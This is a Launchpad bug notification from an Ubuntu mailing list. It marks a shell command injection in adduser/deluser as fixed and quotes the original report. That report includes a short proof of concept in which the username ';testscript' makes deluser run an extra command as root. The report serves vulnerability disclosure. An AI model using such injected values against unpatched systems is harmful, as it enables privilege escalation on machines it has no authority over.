[Bug 1838489] Re: adduser & deluser shell command injection

Benjamin Drung 1838489 at bugs.launchpad.net
Tue Aug 23 08:27:20 UTC 2022 

It's fixed in Debian by version 3.121 and therefore fixed in adduser
3.121ubuntu1 in Ubuntu 22.10 (kinetic).

** Changed in: adduser (Ubuntu)
       Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to adduser in Ubuntu.
https://bugs.launchpad.net/bugs/1838489

Title:
  adduser & deluser shell command injection

Status in adduser package in Ubuntu:
  Fix Released
Status in adduser package in Debian:
  Fix Released

Bug description:
  deluser program is vulnerable to a command injection vulnerability
  when a user is added via adduser with special characters (such as
  ';'). It is only possible when the user exists on the system (adduser
  does not prevent usernames with ';' to be added.)

  This can be a security risk when user accounts on the system can be
  created from arbitrary input, and there are exploitable programs in
  PATH to make privilege escalation possible.

  -------------- Proof of concept ----------------

  # ll /test-file
  ls: cannot access '/test-file': No such file or directory

  # cat /usr/bin/testscript
  #!/bin/bash
  touch /test-file

  # deluser
  Enter a user name to remove: ;testscript
  no crontab for root
  crontab: usage error: no arguments permitted after this option
  usage:  crontab [-u user] file
          crontab [ -u user ] [ -i ] { -e | -l | -r }
                  (default operation is replace, per 1003.2)
          -e      (edit user's crontab)
          -l      (list user's crontab)
          -r      (delete user's crontab)
          -i      (prompt before deleting user's crontab)
  /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting.
  (failed reverse-i-search)`': deluser^C
   # ll /test-file
  -rw------- 1 root root 0 Jul 31 10:25 /test-file

  
  -------- system description --------

  Description:	Ubuntu 18.04.2 LTS
  Release:	18.04

  # apt-cache policy adduser
  adduser:
    Installed: 3.116ubuntu1
    Candidate: 3.116ubuntu1
    Version table:
   *** 3.116ubuntu1 500
          500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
          100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions

More information about the foundations-bugs mailing list